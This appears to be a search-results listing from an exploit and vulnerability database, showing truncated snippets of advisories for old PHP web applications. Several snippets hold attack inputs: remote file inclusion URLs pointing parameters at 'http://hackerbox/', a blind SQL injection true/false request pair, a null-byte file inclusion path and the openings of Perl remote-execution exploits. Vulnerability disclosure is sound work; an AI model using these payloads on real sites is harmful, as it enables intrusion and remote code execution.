17 matches found
phpWebLog <= 0.5.3 Arbitrary File Inclusion
No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...
bilboblog 2.1 - Multiple Vulnerabilities
No description provided by source. ------------------------------------------------------------------ Name : Bilboblog 2.1 Multiples Vulnerabilities Description : Bilboblog is a small application of micro-blogging in Php / MySQL Link :...
Eleanor CMS Rc5.1 Cross Site Scripting Vulnerability
Exploit for unknown platform in category web applications ==================================================== Eleanor CMS Rc5.1 Cross Site Scripting Vulnerability ==================================================== Topic : Eleanor Rc5.1 Bug tType : Cross Site Scripting Credit : ItSecTeam Remote...
MyFusion 6b Local File Inclusion
┌┌─────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └─────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable...
My Simple Forum 7.1 (LFI) Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl My Simple Forum v7.1 Remote Command Execution Exploit Apache Log Poisoning/Injection Local File Inclusion at /theme/default/index.template.php?action=lf%00 XSS at /theme/default/index.template.php?Name=XSS - This needs Register Globals ON Credits ...
My Simple Forum 7.1 (LFI) Remote Command Execution Exploit
Exploit for unknown platform in category web applications ========================================================== My Simple Forum 7.1 LFI Remote Command Execution Exploit ========================================================== !/usr/bin/perl My Simple Forum v7.1 Remote Command Execution...
PHPLD 3.3 - Blind SQL Injection
PHPLD 3.3 - Blind SQL Injection phpLD 3.3 Blind SQL Injection http://www.phplinkdirectory.com/ magicquotesgpc = Off registerglobals = On Vulnerable: GET http://site/phpld/page.php?name= True Request: validpagename' or 1=1 False Request: validpagename' or 1=0 Try this urlencode: validpagename' or...
CVE-2008-4624
PHP remote file inclusion vulnerability in init.php in Fast Click SQL Lite 1.1.7, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the CFGCDIR parameter...
Softpedia SiteXS CMS 0.1.1 Arbitrary File Upload Vulnerability
No description provided by source. SiteXS CMS Remote File Upload Vulnerability Discovered by : Ciph3r E-Mail : [email protected] CMS: sitexs-0.1.1 CMS All Version Vulnerable Download CMS : http://dfn.dl.sourceforge.net/sourceforge/sitexs/sitexs-0.1.1.tar.gz Sp TANX4 : google.com ;...
seagull-063-xss.txt
fuzion / // /\ / / : //\ /| : : .. / \ | | :: :: \ / | | :| || \ / | | || || |\ / | | || || | / | \ | || || | / /\ \ | || || | / / \ -/ -/ | |// \ --/ \ / / / / \ / \/ Product: Seagull STABLE 0.6.3 http://seagullproject.org/ Vulnerable: Seems that none of the theme css renderers sanatize...
NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ============================================================ NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability ============================================================ Vulnerability Type: Remote File Inclusion Vulnerable fil...
PT-2007-5375 · Pluck · Pluck
Name of the Vulnerable Software and Affected Versions: Pluck version 4.3 Description: The issue allows remote attackers to potentially read arbitrary local files via a .. dot dot in the file parameter in the data/inc/theme.php file when register globals is enabled. However, it's noted that the co...
Webfwlog 0.92 - debug.php Remote File Disclosure
Webfwlog 0.92 - debug.php Remote File Disclosure ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + D.Script:ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-stable/All/webfwlog-0.92.tbz + D.Scrpit:http://webfwlog.sourceforge.net/...
Cahier de texte 2.0 (Database Backup/Source Disclosure) Remote Exploit
Exploit for unknown platform in category web applications ====================================================================== Cahier de texte 2.0 Database Backup/Source Disclosure Remote Exploit ====================================================================== !/usr/bin/perl INFORMATIONS...
PT-2006-4905 · Php · Phpprintanalyzer
Name of the Vulnerable Software and Affected Versions: phpPrintAnalyzer version 1.1 Description: A remote file inclusion issue in index.php allows remote attackers to execute arbitrary PHP code when register globals is enabled. This is achieved via a URL in the rep par rapport racine parameter...
PT-2006-3760 · Squirrelmail +1 · Squirrelmail +1
Name of the Vulnerable Software and Affected Versions: SquirrelMail versions 1.4.6 and earlier Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter, under specific conditions where register globals is enabled and magic quotes gpc is...
PT-2006-1804 · Dotproject · Dotproject
Name of the Vulnerable Software and Affected Versions: dotProject versions 2.0.1 and earlier Description: The issue allows remote attackers to execute arbitrary commands via the baseDir parameter in several PHP files, including db adodb.php, db connect.php, session.php, vw usr roles.php,...